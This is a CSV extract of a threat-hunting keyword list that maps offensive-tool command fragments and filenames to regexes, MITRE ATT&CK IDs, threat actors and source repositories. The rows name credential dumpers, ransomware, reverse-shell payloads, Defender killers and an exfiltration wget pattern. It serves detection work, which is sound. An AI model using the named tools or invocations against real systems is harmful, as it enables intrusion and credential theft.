"* vbarandomizer.py*",".{0,1000}\svbarandomizer\.py.{0,1000}","offensive_tool_keyword","spinningteacup","identify different parts of a vba script and perform substitutions","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","3662"
"* VeeamHax.exe",".{0,1000}\sVeeamHax\.exe","offensive_tool_keyword","VeamHax","Exploit for CVE-2023-27532 against Veeam Backup & Replication (Plaintext credential leaking tool)","T1059 - T1203 - T1040 - T1189 - T1010","TA0001 - TA0002 - TA0009 - TA0011","More_eggs","Akira - FIN6","Exploitation tool","https://github.com/sfewer-r7/CVE-2023-27532","1","0","N/A","N/A","8","2","110","22","2023-03-23T18:03:27Z","2023-03-23T16:08:43Z","3663"
"* venomoussway.py*",".{0,1000}\svenomoussway\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","3664"
"* ventrilo-info.nse*",".{0,1000}\sventrilo\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3665"
"* versant-info.nse*",".{0,1000}\sversant\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3666"
"* victim_info_key.py*",".{0,1000}\svictim_info_key\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","0","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","3667"
"* --victimdn *",".{0,1000}\s\-\-victimdn\s.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","3668"
"*----- VIRTUALALLOC HOOK -----*",".{0,1000}\-\-\-\-\-\sVIRTUALALLOC\sHOOK\s\-\-\-\-\-.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","N/A","10","","N/A","","","","3669"
"* vmauthd-brute.nse*",".{0,1000}\svmauthd\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3670"
"* vmware-version.nse*",".{0,1000}\svmware\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3671"
"* --vnc localhost:5900 --listen 5980*",".{0,1000}\s\-\-vnc\slocalhost\:5900\s\-\-listen\s5980.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/ms101/EvilKnievelnoVNC","1","0","#linux","N/A","9","1","44","8","2025-03-08T19:34:41Z","2024-04-13T22:05:04Z","3672"
"* vnc-brute.nse*",".{0,1000}\svnc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3674"
"* vnc-info.nse*",".{0,1000}\svnc\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3675"
"* vnc-title.nse*",".{0,1000}\svnc\-title\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3676"
"* voldemort-info.nse*",".{0,1000}\svoldemort\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3677"
"* Volumiser.exe *",".{0,1000}\sVolumiser\.exe\s.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","0","N/A","N/A","7","4","379","42","2025-04-22T15:47:53Z","2022-11-08T21:38:56Z","3678"
"* vtam-enum.nse*",".{0,1000}\svtam\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3680"
"* -vulnerable -stdout -hide-admins*",".{0,1000}\s\-vulnerable\s\-stdout\s\-hide\-admins.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","3681"
"* vulners.nse*",".{0,1000}\svulners\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3682"
"* vulscan.nse*",".{0,1000}\svulscan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","N/A","10","968","369","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z","3683"
"* vuze-dht-info.nse*",".{0,1000}\svuze\-dht\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3684"
"* -w wordlist/*.txt*http*",".{0,1000}\s\-w\swordlist\/.{0,1000}\.txt.{0,1000}http.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","3688"
"* Waitfor-Persistence.ps1*",".{0,1000}\sWaitfor\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","0","N/A","N/A","9","1","54","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z","3689"
"* -watson -Command *",".{0,1000}\s\-watson\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","3690"
"* wcreddump (windows credentials dump)*",".{0,1000}\swcreddump\s\(windows\scredentials\sdump\).{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#linux #windows #content","N/A","10","1","75","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z","3691"
"* wcreddump.py*",".{0,1000}\swcreddump\.py.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#linux #windows","N/A","10","1","75","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z","3692"
"* wdb-version.nse*",".{0,1000}\swdb\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3693"
"* --wdigest disable*",".{0,1000}\s\-\-wdigest\sdisable.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3694"
"* --wdigest enable*",".{0,1000}\s\-\-wdigest\senable.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","3695"
"* web-hacking-toolkit *",".{0,1000}\sweb\-hacking\-toolkit\s.{0,1000}","offensive_tool_keyword","web-hacking-toolkit","A web hacking toolkit Docker image with GUI applications support.","T1210 - T1059 - T1105 - T1189 - T1071","TA0001 - TA0002 - TA0011 - TA0005","N/A","N/A","Exploitation tool","https://github.com/signedsecurity/web-hacking-toolkit","1","0","N/A","N/A","N/A","2","N/A","N/A","N/A","N/A","3697"
"* weblogic-t3-info.nse*",".{0,1000}\sweblogic\-t3\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3698"
"* -WebRoot C:\inetpub\wwwroot\SecretServer*",".{0,1000}\s\-WebRoot\sC\:\\inetpub\\wwwroot\\SecretServer.{0,1000}","offensive_tool_keyword","SecretServerSecretStealer","Powershell script that decrypts the data stored within a Thycotic Secret Server","T1552 - T1027 - T1059","TA0006","N/A","EvilCorp*","Credential Access","https://github.com/denandz/SecretServerSecretStealer","1","0","N/A","N/A","10","1","78","14","2020-08-03T06:52:27Z","2017-04-21T04:06:24Z","3699"
"* --weekday-warrior -*",".{0,1000}\s\-\-weekday\-warrior\s\-.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","3701"
"* --werfault *\temp\*",".{0,1000}\s\-\-werfault\s.{0,1000}\\temp\\.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","3702"
"* wget ""https://*/interactshbuild*",".{0,1000}\swget\s\""https\:\/\/.{0,1000}\/interactshbuild.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","3703"
"* WHERE TABLE_NAME like 'C2AGENTS'*",".{0,1000}\sWHERE\sTABLE_NAME\slike\s\'C2AGENTS\'.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","3705"
"* WHERE TABLE_NAME like 'C2COMMANDS'*",".{0,1000}\sWHERE\sTABLE_NAME\slike\s\'C2COMMANDS\'.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","3706"
"* whoami > zzz.txt*",".{0,1000}\swhoami\s\>\szzz\.txt.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","https://github.com/r00t-3xp10it/redpill","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3707"
"* whois-domain.nse*",".{0,1000}\swhois\-domain\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3708"
"* whois-ip.nse*",".{0,1000}\swhois\-ip\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","3709"
"* will be obfuscated and integrated in created documents*",".{0,1000}\swill\sbe\sobfuscated\sand\sintegrated\sin\screated\sdocuments.{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","0","N/A","N/A","8","6","544","127","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z","3710"
"* will be written to PME\*",".{0,1000}\swill\sbe\swritten\sto\sPME\\.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","3711"
"* WinBruteLogon.zip*",".{0,1000}\sWinBruteLogon\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","3713"
"* windapsearch.py*",".{0,1000}\swindapsearch\.py.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","3714"
"* winDefKiller *",".{0,1000}\swinDefKiller\s.{0,1000}","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","0","N/A","N/A","10","5","448","67","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z","3715"
"* Windows Recall feature found. Do you want to proceed with the extraction?*",".{0,1000}\sWindows\sRecall\sfeature\sfound\.\sDo\syou\swant\sto\sproceed\swith\sthe\sextraction\?.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","N/A","script content","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","3716"
"* Windows Recall feature not found. Nothing to extract*",".{0,1000}\sWindows\sRecall\sfeature\snot\sfound\.\sNothing\sto\sextract.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","N/A","script content","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","3717"
"* windows/csharp_exe*",".{0,1000}\swindows\/csharp_exe.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","3718"
"* windows/meterpreter/reverse_tcp*",".{0,1000}\swindows\/meterpreter\/reverse_tcp.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla - Black Basta","C2","https://github.com/maldevel/canisrufus","1","0","N/A","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","3719"
"* windows/shell/bind_tcp *",".{0,1000}\swindows\/shell\/bind_tcp\s.{0,1000}","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","APT32 - Black Basta","Resource Development","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","3720"
"* windows/shell/bind_tcp *shellcode*",".{0,1000}\swindows\/shell\/bind_tcp\s.{0,1000}shellcode.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","3721"
"* windows_downdate.py*",".{0,1000}\swindows_downdate\.py.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","0","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","3722"
